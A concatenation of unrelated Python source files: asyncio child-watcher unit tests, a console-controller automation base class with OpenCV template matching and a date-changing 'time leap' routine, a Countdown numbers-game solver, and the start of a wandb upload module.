# remove child handler 2 multiple times
self.assertTrue(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
# all children terminate
self.add_zombie(54, 0)
self.add_zombie(55, 1)
self.add_zombie(56, 2)
self.running = False
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(56, 2, 3)
@waitpid_mocks
def test_sigchld_unhandled_exception(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(57, callback)
# raise an exception
m.waitpid.side_effect = ValueError
with mock.patch.object(log.logger,
'error') as m_error:
self.assertEqual(self.watcher._sig_chld(), None)
self.assertTrue(m_error.called)
@waitpid_mocks
def test_sigchld_child_reaped_elsewhere(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(58, callback)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates
self.running = False
self.add_zombie(58, 4)
# waitpid is called elsewhere
os.waitpid(58, os.WNOHANG)
m.waitpid.reset_mock()
# sigchld
with self.ignore_warnings:
self.watcher._sig_chld()
if isinstance(self.watcher, asyncio.FastChildWatcher):
# here the FastChildWatche enters a deadlock
# (there is no way to prevent it)
self.assertFalse(callback.called)
else:
callback.assert_called_once_with(58, 255)
@waitpid_mocks
def test_sigchld_unknown_pid_during_registration(self, m):
# register two children
callback1 = mock.Mock()
callback2 = mock.Mock()
with self.ignore_warnings, self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(591, 7)
# an unknown child terminates
self.add_zombie(593, 17)
self.watcher._sig_chld()
self.watcher.add_child_handler(591, callback1)
self.watcher.add_child_handler(592, callback2)
callback1.assert_called_once_with(591, 7)
self.assertFalse(callback2.called)
@waitpid_mocks
def test_set_loop(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(60, callback)
# attach a new loop
old_loop = self.loop
self.loop = self.new_test_loop()
patch = mock.patch.object
with patch(old_loop, "remove_signal_handler") as m_old_remove, \
patch(self.loop, "add_signal_handler") as m_new_add:
self.watcher.attach_loop(self.loop)
m_old_remove.assert_called_once_with(
signal.SIGCHLD)
m_new_add.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
# child terminates
self.running = False
self.add_zombie(60, 9)
self.watcher._sig_chld()
callback.assert_called_once_with(60, 9)
@waitpid_mocks
def test_set_loop_race_condition(self, m):
# register 3 children
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(61, callback1)
self.watcher.add_child_handler(62, callback2)
self.watcher.add_child_handler(622, callback3)
# detach the loop
old_loop = self.loop
self.loop = None
with mock.patch.object(
old_loop, "remove_signal_handler") as m_remove_signal_handler:
with self.assertWarnsRegex(
RuntimeWarning, 'A loop is being detached'):
self.watcher.attach_loop(None)
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
# child 1 & 2 terminate
self.add_zombie(61, 11)
self.add_zombie(62, -5)
# SIGCHLD was not caught
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(callback3.called)
# attach a new loop
self.loop = self.new_test_loop()
with mock.patch.object(
self.loop, "add_signal_handler") as m_add_signal_handler:
self.watcher.attach_loop(self.loop)
m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
callback1.assert_called_once_with(61, 11) # race condition!
callback2.assert_called_once_with(62, -5) # race condition!
self.assertFalse(callback3.called)
callback1.reset_mock()
callback2.reset_mock()
# child 3 terminates
self.running = False
self.add_zombie(622, 19)
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(622, 19)
@waitpid_mocks
def test_close(self, m):
# register two children
callback1 = mock.Mock()
with self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(63, 9)
# other child terminates
self.add_zombie(65, 18)
self.watcher._sig_chld()
self.watcher.add_child_handler(63, callback1)
self.watcher.add_child_handler(64, callback1)
self.assertEqual(len(self.watcher._callbacks), 1)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertEqual(len(self.watcher._zombies), 1)
with mock.patch.object(
self.loop,
"remove_signal_handler") as m_remove_signal_handler:
self.watcher.close()
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
self.assertFalse(self.watcher._callbacks)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertFalse(self.watcher._zombies)
@waitpid_mocks
def test_add_child_handler_with_no_loop_attached(self, m):
callback = mock.Mock()
with self.create_watcher() as watcher:
with self.assertRaisesRegex(
RuntimeError,
'the child watcher does not have a loop attached'):
watcher.add_child_handler(100, callback)
class SafeChildWatcherTests (ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.SafeChildWatcher()
class FastChildWatcherTests (ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.FastChildWatcher()
class PolicyTests(unittest.TestCase):
def create_policy(self):
return asyncio.DefaultEventLoopPolicy()
def test_get_child_watcher(self):
policy = self.create_policy()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
self.assertIsNone(watcher._loop)
def test_get_child_watcher_after_set(self):
policy = self.create_policy()
watcher = asyncio.FastChildWatcher()
policy.set_child_watcher(watcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_with_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIs(watcher._loop, loop)
loop.close()
def test_get_child_watcher_thread(self):
def f():
policy.set_event_loop(policy.new_event_loop())
self.assertIsInstance(policy.get_event_loop(),
asyncio.AbstractEventLoop)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIsNone(watcher._loop)
policy.get_event_loop().close()
policy = self.create_policy()
th = threading.Thread(target=f)
th.start()
th.join()
def test_child_watcher_replace_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
watcher = policy.get_child_watcher()
self.assertIs(watcher._loop, loop)
new_loop = policy.new_event_loop()
policy.set_event_loop(new_loop)
self.assertIs(watcher._loop, new_loop)
policy.set_event_loop(None)
self.assertIs(watcher._loop, None)
loop.close()
new_loop.close()
class TestFunctional(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
asyncio.set_event_loop(None)
def test_add_reader_invalid_argument(self):
def assert_raises():
return self.assertRaisesRegex(ValueError, r'Invalid file object')
cb = lambda: None
with assert_raises():
self.loop.add_reader(object(), cb)
with assert_raises():
self.loop.add_writer(object(), cb)
with assert_raises():
self.loop.remove_reader(object())
with assert_raises():
self.loop.remove_writer(object())
def test_add_reader_or_writer_transport_fd(self):
def assert_raises():
return self.assertRaisesRegex(
RuntimeError,
r'File descriptor .* is used by transport')
async def runner():
tr, pr = await self.loop.create_connection(
lambda: asyncio.Protocol(), sock=rsock)
try:
cb = lambda: None
with assert_raises():
self.loop.add_reader(rsock, cb)
with assert_raises():
self.loop.add_reader(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_reader(rsock)
with assert_raises():
self.loop.remove_reader(rsock.fileno())
with assert_raises():
self.loop.add_writer(rsock, cb)
with assert_raises():
self.loop.add_writer(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_writer(rsock)
with assert_raises():
self.loop.remove_writer(rsock.fileno())
finally:
tr.close()
rsock, wsock = socket.socketpair()
try:
self.loop.run_until_complete(runner())
finally:
rsock.close()
wsock.close()
if __name__ == '__main__':
unittest.main()
|
PythonCommandBase.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from abc import ABCMeta, abstractclassmethod
from time import sleep
import threading
import cv2
from .Keys import KeyPress, Button, Hat, Direction, Stick
from . import CommandBase
# the class For notifying stop signal is sent from Main window
class StopThread(Exception):
pass
# Python command
class PythonCommand(CommandBase.Command):
def __init__(self):
super(PythonCommand, self).__init__()
self.keys = None
self.thread = None
self.alive = True
self.postProcess = None
@abstractclassmethod
def do(self):
pass
def do_safe(self, ser):
if self.keys is None:
self.keys = KeyPress(ser)
try:
if self.alive:
self.do()
self.finish()
except StopThread:
print('-- finished successfully. --')
except:
if self.keys is None:
self.keys = KeyPress(ser)
print('interruppt')
import traceback
traceback.print_exc()
self.keys.end()
self.alive = False
def start(self, ser, postProcess=None):
self.alive = True
self.postProcess = postProcess
if not self.thread:
self.thread = threading.Thread(target=self.do_safe, args=(ser,))
self.thread.start()
def end(self, ser):
self.sendStopRequest()
def sendStopRequest(self):
if self.checkIfAlive(): # try if we can stop now
self.alive = False
print('-- sent a stop request. --')
# NOTE: Use this function if you want to get out from a command loop by yourself
def finish(self):
self.alive = False
self.end(self.keys.ser)
# press button at duration times(s)
def press(self, buttons, duration=0.1, wait=0.1):
self.keys.input(buttons)
self.wait(duration)
self.keys.inputEnd(buttons)
self.wait(wait)
self.checkIfAlive()
# press button at duration times(s) repeatedly
def pressRep(self, buttons, repeat, duration=0.1, interval=0.1, wait=0.1):
for i in range(0, repeat):
self.press(buttons, duration, 0 if i == repeat - 1 else interval)
self.wait(wait)
# add hold buttons
def hold(self, buttons, wait=0.1):
self.keys.hold(buttons)
self.wait(wait)
# release holding buttons
def holdEnd(self, buttons):
self.keys.holdEnd(buttons)
self.checkIfAlive()
# do nothing at wait time(s)
def wait(self, wait):
sleep(wait)
self.checkIfAlive()
def checkIfAlive(self):
if not self.alive:
self.keys.end()
self.keys = None
self.thread = None
if not self.postProcess is None:
self.postProcess()
self.postProcess = None
# raise exception for exit working thread
raise StopThread('exit successfully')
else:
return True
# Use time glitch
# Controls the system time and get every-other-day bonus without any punishments
def timeLeap(self, is_go_back=True):
self.press(Button.HOME, wait=1)
self.press(Direction.DOWN)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Button.A, wait=1.5) # System Settings
self.press(Direction.DOWN, duration=2, wait=0.5)
self.press(Button.A, wait=0.3) # System Settings > System
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN, wait=0.3)
self.press(Button.A, wait=0.2) # Date and Time
self.press(Direction.DOWN, duration=0.7, wait=0.2)
# increment and decrement
if is_go_back:
self.press(Button.A, wait=0.2)
self.press(Direction.UP, wait=0.2) # Increment a year
self.press(Direction.RIGHT, duration=1.5)
self.press(Button.A, wait=0.5)
self.press(Button.A, wait=0.2)
self.press(Direction.LEFT, duration=1.5)
self.press(Direction.DOWN, wait=0.2) # Decrement a year
self.press(Direction.RIGHT, duration=1.5)
self.press(Button.A, wait=0.5)
# use only increment
# for use of faster time leap
else:
self.press(Button.A, wait=0.2)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.UP, wait=0.2) # increment a day
self.press(Direction.RIGHT, duration=1)
self.press(Button.A, wait=0.5)
self.press(Button.HOME, wait=1)
self.press(Button.HOME, wait=1)
TEMPLATE_PATH = "./Template/"
class ImageProcPythonCommand(PythonCommand):
def __init__(self, cam):
super(ImageProcPythonCommand, self).__init__()
self.camera = cam
# Judge if current screenshot contains a template using template matching
# It's recommended that you use gray_scale option unless the template color wouldn't be cared for performace
# 現在のスクリーンショットと指定した画像のテンプレートマッチングを行います
# 色の違いを考慮しないのであればパフォーマンスの点からuse_grayをTrueにしてグレースケール画像を使うことを推奨します
def isContainTemplate(self,
template_path, threshold=0.7, use_gray=True, show_value=False,
area=[], tmp_area=[]):
# Read a current image
src = self.camera.readFrame()
src = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) if use_gray else src
if area:
src = src[area[2]:area[3], area[0]:area[1]]
# Read a template image
template = cv2.imread(TEMPLATE_PATH+template_path, cv2.IMREAD_GRAYSCALE if use_gray else cv2.IMREAD_COLOR)
if tmp_area:
template = template[tmp_area[2]:tmp_area[3], tmp_area[0]:tmp_area[1]] # trim
w, h = template.shape[1], template.shape[0]
method = cv2.TM_CCOEFF_NORMED
res = cv2.matchTemplate(src, template, method)
_, max_val, _, max_loc = cv2.minMaxLoc(res)
if show_value:
print(template_path + ' ZNCC value: ' + str(max_val))
if max_val > threshold:
if use_gray:
src = cv2.cvtColor(src, cv2.COLOR_GRAY2BGR)
top_left = max_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(src, top_left, bottom_right, (255, 0, 255), 2)
return True
else:
return False
# Get interframe difference binarized image
# フレーム間差分により2値化された画像を取得
def getInterframeDiff(self, frame1, frame2, frame3, threshold):
diff1 = cv2.absdiff(frame1, frame2)
diff2 = cv2.absdiff(frame2, frame3)
diff = cv2.bitwise_and(diff1, diff2)
# binarize
img_th = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY)[1]
# remove noise
mask = cv2.medianBlur(img_th, 3)
return mask
# Take a screenshot (saved in /SerialController/Captures/)
# スクリーンショットを取得
def saveCapture(self, filename):
self.camera.saveCapture(filename)
|
countdown.py
|
#!/usr/bin/env python
"""
http://en.wikipedia.org/wiki/Countdown_%28game_show%29#Numbers_round
Given 6 integers, and a target integer, combine the 6 integers using
only the 4 basic arithmetic operations (+,-,*,/) to come as close as
possible to the target.
You don't have to use all 6 integers. A number can be used as many
times as it appears.
In the game show, the target number is a random three digit number.
The 6 integers are drawn from two sets. The set of large integers has
four numbers: (25, 50, 75, 100) (in some episodes this was changed to
(12, 37, 62, 87)). The set of small integers had 20 numbers: the
numbers 1..10 twice. The contestant could say how many of each set he
would like (e.g. 4 large and 2 small, which of course would give him
all the large numbers)
The game show further stipulates that every step of the calculation
must result in positive integers.
I'm not sure if the game show also requires that you apply each
operation one step at a time (i.e., a "left-most" parenthesization)
One example, using 3, 6, 25, 50, 75, 100, get to 952
((100 + 6) * 3 * 75 - 50) / 25 = 106 * 9 - 2 = 952
Other examples:
Use 1, 3, 7, 10, 25, 50 to get 765
http://www.4nums.com/game/difficulties/
Compare to haskell version:
http://www.cs.nott.ac.uk/~gmh/countdown2.hs
"""
# --------------------------------------------------------------------------- #
from __future__ import absolute_import, division, with_statement
import logging
import optparse
import operator
import sys
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
logging.basicConfig(format='[%(asctime)s '
'%(funcName)s:%(lineno)s %(levelname)-5s] '
'%(message)s')
# --------------------------------------------------------------------------- #
DEFAULT_NUM_VALS = 6
DEFAULT_MIN_TARGET = 100
DEFAULT_MAX_TARGET = 999
DEFAULT_NUM_LARGE = 4
DEFAULT_LARGE_NUMBERS = '25,50,75,100'
# --------------------------------------------------------------------------- #
def main():
(opts, args) = getopts()
(vals, target) = generate(
opts.num_vals,
target=opts.target,
given=args,
min_target=opts.min_target,
max_target=opts.max_target,
num_large=opts.num_large,
large_numbers=opts.large_numbers,
replacement=opts.replacement)
print "Target: {0}, Vals: {1}".format(target, vals)
results = countdown(
vals, target,
all_orders=(not opts.in_order),
all_subsets=(not opts.use_all),
use_pow=opts.use_pow)
if opts.single_threaded:
results = tuple(results)
num_results = len(results)
if results and results[0].value != target:
num_results = 0
raw_input("Press Enter to See Solutions ({0} results found): ".format(
num_results))
else:
(_, queue) = run_in_thread(results)
results = iter_queue_values(queue)
raw_input("Press Enter to See Solutions: ")
for expr in results:
print "{0} = {1}".format(expr, expr.value)
def getopts():
parser = optparse.OptionParser()
parser.add_option('--verbose', action='store_true')
parser.add_option('--log_level')
parser.add_option('--generate', action='store_true')
parser.add_option('--replacement', action='store_true',
help='When generating small values, sample with '
'replacement')
parser.add_option('--num_vals', type=int)
parser.add_option('--target', '-t', type=int)
parser.add_option('--min_target', type=int, default=DEFAULT_MIN_TARGET)
parser.add_option('--max_target', type=int, default=DEFAULT_MAX_TARGET)
parser.add_option('--num_large', type=int, default=DEFAULT_NUM_LARGE)
parser.add_option('--use_pow', action='store_true',
help='Allow exponentiation')
parser.add_option('--large_numbers', default=DEFAULT_LARGE_NUMBERS)
parser.add_option('--in_order', action='store_true',
help="The numbers must be used in order "
"in the expression")
parser.add_option('--use_all', action='store_true',
help="All the given numbers must be used "
"in the expression")
parser.add_option('--integer', action='store_true',
help='Requires that every intermediate step '
'in the calculation produces an integer')
parser.add_option('--positive', action='store_true',
help='Requires that every intermediate step in '
'the calculation produces a positive number')
parser.add_option('--prune', action='store_true',
help='prunes out some solutions '
'if shorter solutions exist')
parser.add_option('--twentyfour', action='store_true',
help='run the standard 24 game')
parser.add_option('--single_threaded', action='store_true',
help='run in a single thread')
(opts, args) = parser.parse_args()
if opts.verbose:
logging.getLogger().setLevel(logging.DEBUG)
if opts.log_level is not None:
level = getattr(logging, opts.log_level.upper())
logging.getLogger().setLevel(level)
logging.info("Setting log level to %s", level)
if opts.num_vals is None:
opts.num_vals = len(args)
if opts.num_vals == 0:
opts.num_vals = DEFAULT_NUM_VALS
opts.large_numbers = opts.large_numbers.split(',')
if opts.integer:
Operators.DIV = Operators.IDIV
if opts.positive:
Expression.POSITIVE_ONLY = True
# This reduces the number of expressions we try, so we don't try
# both a + b and b + a
Operators.ADD = Operators.ASADD
Operators.MUL = Operators.ASMUL
if opts.prune:
# This avoids any solution where we multiply or divide by an
# expression that is 1
Operators.MUL = Operators.SMUL
Operators.ADD = Operators.SADD
if opts.integer:
Operators.DIV = Operators.SIDIV
if opts.twentyfour:
opts.target = 24
opts.num_vals = 4
opts.num_large = 0
opts.replacement = True
opts.use_all = True
opts.single_threaded = True
return (opts, args)
# --------------------------------------------------------------------------- #
def iter_queue_values(queue):
while True:
try:
yield queue.get(block=False)
except Empty:
break
def run_in_thread(gen):
"""
Mostly stolen from
http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
"""
def enqueue_output(gen, queue):
for line in gen:
queue.put(line)
queue = Queue()
t = Thread(target=enqueue_output, args=(gen, queue))
t.daemon = True
t.start()
return (t, queue)
def sample_without_replacement(n, vals):
if n > len(vals):
raise ValueError("Can't choose {0} values from {1}".format(n, vals))
import random
copy = list(vals)
retvals = []
for _ in xrange(n):
idx = random.randrange(0, len(copy))
retvals.append(copy[idx])
copy = copy[:idx] + copy[idx+1:]
return retvals
def generate(num_vals=DEFAULT_NUM_VALS,
target=None,
given=None,
min_target=DEFAULT_MIN_TARGET,
max_target=DEFAULT_MAX_TARGET,
num_large=DEFAULT_NUM_LARGE,
large_numbers=None,
replacement=False):
import random
# choose the target
if target is None:
target = random.randint(min_target, max_target)
# choose the values
if given is None:
given = []
given = [int(g) for g in given]
if len(given) > num_vals:
vals = given[:num_vals]
else:
vals = given
if large_numbers is None:
large_numbers = DEFAULT_LARGE_NUMBERS.split(',')
large_numbers = [int(l) for l in large_numbers]
vals.extend(
sample_without_replacement(
min(num_vals - len(vals), num_large), large_numbers))
if num_vals > len(vals):
num_left = num_vals - len(vals)
if replacement:
for _ in xrange(num_left):
vals.append(random.randint(1, 10))
else:
vals.extend(sample_without_replacement(
num_left, range(1, 11) * 2))
return vals, target
# --------------------------------------------------------------------------- #
class ExpressionError(Exception):
pass
class Expression(object):
POSITIVE_ONLY = False
def __init__(self, value):
self._value = value
@property
def value(self):
if self._value is None:
value = try_round(self.compute_value())
if self.POSITIVE_ONLY and value < 0:
raise ExpressionError("Negative value")
self._value = value
return self._value
def compute_value(self):
raise NotImplementedError
def __str__(self):
return str(self.value)
@property
def exception(self):
try:
self.value
return False
except ZeroDivisionError:
return True
except ExpressionError:
return True
except ValueError:
return True
@property
def integer(self):
return int(self.value) == self.value
@property
def negative(self):
return self.value < 0
class Value(Expression):
def __init__(self, value):
super(Value, self).__init__(value)
def __repr__(self):
return "Value({0})".format(self.value)
def __eq__(self, other):
return type(self) == type(other) and self.value == other.value
def __hash__(self):
return hash(self.value)
class BiExpr(Expression):
USE_CACHE = False
CACHE = {}
def __init__(self, operator, left, right):
super(BiExpr, self).__init__(None)
self.operator = operator
self.left = left
self.right = right
def compute_value(self):
try:
return self.operator(self.left.value, self.right.value)
except OverflowError as e:
(tp, value, traceback) = sys.exc_info()
value = 'While evaluating expression {0}: {1}'.format(self, value)
raise tp, value, traceback
def __str__(self):
return '({0} {1} {2})'.format(self.left, self.operator, self.right)
def __eq__(self, other):
return ((self.operator, self.left, self.right) ==
(other.operator, other.left, other.right))
def __hash__(self):
return hash((self.operator, self.left, self.right))
@classmethod
def get_expr(cls, operator, left, right):
if cls.USE_CACHE:
key = (operator, left, right)
if key not in cls.CACHE:
cls.CACHE[key] = BiExpr(operator, left, right)
return cls.CACHE[key]
else:
return BiExpr(operator, left, right)
class Operator(object):
def __init__(self, func, string, commutative=False):
self.func = func
self.string = string
self.commutative = commutative
def __call__(self, *args, **kwargs):
return self.func(*args, **kwargs)
def __str__(self):
return self.string
def __eq__(self, other):
return self.string == other.string
def __hash__(self):
return hash(self.string)
def fpeq(a, b, epsilon=1e-6):
"""
Floating point equality
"""
return abs(a - b) < epsilon
def safediv(a, b):
try:
return operator.truediv(a, b)
except OverflowError as e:
try:
return intdiv(a, b)
except ExpressionError:
raise(e)
def intdiv(a, b):
if a % b != 0:
raise ExpressionError("{0} is not a multiple of {1}".format(a, b))
return operator.div(a, b)
def strictdiv(a, b):
if a % b != 0 or b == 1:
raise ExpressionError("{0} is not a multiple of {1}".format(a, b))
return operator.div(a, b)
def asymadd(a, b):
if a < b:
raise ExpressionError("Optimization: only add bigger to smaller")
return a + b
def asymmul(a, b):
if a < b:
raise ExpressionError("Optimization: only multiply bigger to smaller")
return a * b
def strictmul(a, b):
if a < b or a == 1 or b == 1:
raise ExpressionError("Optimization: only multiply bigger to smaller")
return a * b
def strictadd(a, b):
if a < b or a == 0 or b == 0:
raise ExpressionError("Optimization: only add bigger to smaller")
return a + b
def try_round(v):
try:
return int(round(v)) if fpeq(v, round(v)) else v
except OverflowError:
return v
class Operators(object):
ADD = Operator(operator.add, '+', commutative=True)
SUB = Operator(operator.sub, '-')
MUL = Operator(operator.mul, '*', commutative=True)
DIV = Operator(safediv, '/')
POW = Operator(operator.pow, '^')
# Throws an error if the value isn't an integer
IDIV = Operator(intdiv, '/')
# Throws an error if the second number is bigger
ASADD = Operator(asymadd, '+')
ASMUL = Operator(asymmul, '*')
# Throws an error if one of the arguments is the identity
SADD = Operator(strictadd, '+')
SMUL = Operator(strictmul, '*')
SIDIV = Operator(strictdiv, '/')
@classmethod
def all(cls, use_pow=False):
if use_pow:
return (cls.ADD, cls.SUB, cls.MUL, cls.DIV, cls.POW)
else:
return (cls.ADD, cls.SUB, cls.MUL, cls.DIV)
def get_subsets(lst, max_size=None, avoid_dups=False):
"""
>>> [s for s in get_subsets(())]
[()]
>>> [s for s in get_subsets((1,))]
[(), (1,)]
>>> [s for s in get_subsets((1, 2))]
[(), (1,), (2,), (1, 2)]
>>> [s for s in get_subsets((1, 2, 3))]
[(), (1,), (2,), (1, 2), (3,), (1, 3), (2, 3), (1, 2, 3)]
>>> [s for s in get_subsets((1, 2, 3), max_size=2)]
[(), (1,), (2,), (1, 2), (3,), (1, 3), (2, 3)]
>>> [s for s in get_subsets((1, 1), avoid_dups=True)]
[(), (1,), (1, 1)]
>>> [s for s in get_subsets((1, 1, 2), avoid_dups=True)]
[(), (1,), (1, 1), (2,), (1, 2), (1, 1, 2)]
>>> [s for s in get_subsets((1, 1, 2, 2), avoid_dups=True)]
[(), (1,), (1, 1), (2,), (1, 2), (1, 1, 2), (2, 2), (1, 2, 2), (1, 1, 2, 2)]
"""
if len(lst) <= 0:
yield lst
return
seen = set()
for subset in get_subsets(lst[1:], max_size=max_size,
avoid_dups=avoid_dups):
if avoid_dups:
sset = tuple(sorted(subset))
if not avoid_dups or sset not in seen:
yield subset
if avoid_dups:
seen.add(sset)
if max_size is None or len(subset) + 1 <= max_size:
new = (lst[0],) + subset
if avoid_dups:
sset = tuple(sorted((new)))
if not avoid_dups or sset not in seen:
yield new
if avoid_dups:
seen.add(sset)
def get_partitions(lst):
"""
>>> [p for p in get_partitions([])]
[]
>>> [p for p in get_partitions([1])]
[]
>>> [p for p in get_partitions(range(2))]
[([0], [1])]
>>> [p for p in get_partitions(range(3))]
[([0], [1, 2]), ([0, 1], [2])]
>>> [p for p in get_partitions(range(4))]
[([0], [1, 2, 3]), ([0, 1], [2, 3]), ([0, 1, 2], [3])]
"""
for ii in xrange(1, len(lst)):
yield lst[:ii], lst[ii:]
def permutations(lst, avoid_dups=False):
"""
>>> import itertools
>>> [p for p in permutations(())]
[()]
>>> [p for p in permutations((1,))]
[(1,)]
>>> [p for p in permutations((1, 2))]
[(1, 2), (2, 1)]
>>> [p for p in permutations((1, 2, 3))]
[(1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1), (3, 1, 2), (3, 2, 1)]
>>> [p for p in permutations((1, 1), avoid_dups=True)]
[(1, 1)]
>>> [p for p in permutations((1, 1, 2), avoid_dups=True)]
[(1, 1, 2), (1, 2, 1), (2, 1, 1)]
>>> comp = lambda lst: set(p for p in permutations(lst)) == set(p for p in itertools.permutations(lst))
>>> comp(tuple(range(3)))
True
>>> comp(tuple(range(4)))
True
>>> comp(tuple(range(5)))
True
"""
if len(lst) == 0:
yield lst
return
seen = set()
for (ii, elt) in enumerate(lst):
if avoid_dups:
if elt in seen:
continue
else:
seen.add(elt)
for perm in permutations(lst[:ii] + lst[ii+1:], avoid_dups=avoid_dups):
yield (elt,) + perm
def get_splits(vals, all_orders=False, all_subsets=False, avoid_dups=True):
"""
>>> [s for s in get_splits((), all_orders=True, all_subsets=True)]
[]
>>> [s for s in get_splits(tuple(range(1)), all_orders=True, all_subsets=True)]
[]
>>> [s for s in get_splits(tuple(range(2)), all_orders=True, all_subsets=True)]
[((0,), (1,)), ((1,), (0,))]
>>> sorted(s for s in get_splits(tuple(range(3)), all_orders=True, all_subsets=True, avoid_dups=True))
[((0,), (1,)), ((0,), (1, 2)), ((0,), (2,)), ((0,), (2, 1)), ((0, 1), (2,)), ((0, 2), (1,)), ((1,), (0,)), ((1,), (0, 2)), ((1,), (2,)), ((1,), (2, 0)), ((1, 0), (2,)), ((1, 2), (0,)), ((2,), (0,)), ((2,), (0, 1)), ((2,), (1,)), ((2,), (1, 0)), ((2, 0), (1,)), ((2, 1), (0,))]
"""
import itertools
if all_subsets:
subsets = (s for s in get_subsets(vals)
if len(s) > 0)
else:
subsets = (vals,)
if all_orders:
perms = (p
for s in subsets
for p in permutations(s, avoid_dups=avoid_dups))
if avoid_dups:
perms = set(perms)
else:
perms = subsets
return itertools.chain.from_iterable(
get_partitions(p) for p in perms)
def all_expressions(vals, all_orders=False, all_subsets=False, use_pow=False):
"""
@param vals: a list of Value or Expr objects.
"""
if len(vals) == 1:
yield vals[0]
return
if all_orders and all_subsets:
logging.debug("Vals: {0}".format(vals))
splits = get_splits(
vals, all_orders=all_orders, all_subsets=all_subsets)
for (lpart, rpart) in splits:
if all_orders and all_subsets:
logging.debug("Doing split {0} v {1}".format(lpart, rpart))
for left in all_expressions(lpart, use_pow=use_pow):
if left.exception:
continue
for right in all_expressions(rpart, use_pow=use_pow):
if right.exception:
continue
for op in Operators.all(use_pow=use_pow):
expr = BiExpr.get_expr(op, left, right)
if not expr.exception:
yield expr
# if not op.commutative:
# expr = BiExpr.get_expr(op, right, left)
# if not expr.exception:
# yield expr
def countdown(vals, target, all_orders=True, all_subsets=True, use_pow=False):
"""
If all_orders is False, then the numbers must be used in the order
given. I.e., if you give the numbers 1, 2, 3, 4, 5, 6, 7, 8, 9
and want to make 100 and all_orders is False, then
((1 + (2 / 3)) / (((4 / 5) / 6) / 8)) = 100.0
is ok, but
(9 - (5 - (7 / ((2 - (1 / 4)) / (8 * (6 - 3)))))) = 100.0
is not.
if all_subsets is False, then you have to use every digit, so
(1 - (2 * (3 * (4 * (5 + (((6 - 7) / 8) - 9)))))) = 100.0
is ok, but
((1 + (2 / 3)) / (((4 / 5) / 6) / 8)) = 100.0
is not.
"""
vals = tuple(Value(v) for v in vals)
closest = []
best = None
tries = 0
tried = set()
for expr in all_expressions(vals,
all_orders=all_orders,
all_subsets=all_subsets,
use_pow=use_pow):
if str(expr) in tried:
logging.error("Tried the same expression twice: {0}".format(expr))
continue
tried.add(str(expr))
tries += 1
value = try_round(expr.value)
distance = abs(target - value)
logging.debug("Trying {0} = {1}, abs({2} - {1}) = {3}".format(
expr, value, target, distance))
if len(closest) == 0:
closest.append(expr)
best = distance
elif distance < best:
logging.info(
"Found {0} = {1}, distance = abs({2} - {1}) = {3} < {4}".format(
expr, value, target, distance, best))
closest = [expr]
best = distance
elif distance == best:
logging.debug(
"Found {0} = {1}, distance = abs({2} - {1}) = {3} = {4}".format(
expr, value, target, distance, best))
closest.append(expr)
if distance == 0:
yield expr
if tries % 1000000 == 0:
logging.info("{0} expressions tried so far".format(tries))
logging.info("Tried {0} expressions".format(tries))
if best != 0:
for c in closest:
yield c
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
main()
# --------------------------------------------------------------------------- #
|
step_upload.py
|
"""Batching file prepare requests to our API."""
import collections
import threading
from six.moves import queue
from wandb.filesync import upload_job
from wandb.errors.term import termerror
RequestUpload = collections.namedtuple(
"EventStartUploadJob",
("path", "save_name", "artifact_id", "md5", "copied", "save_fn", "digest"),
)
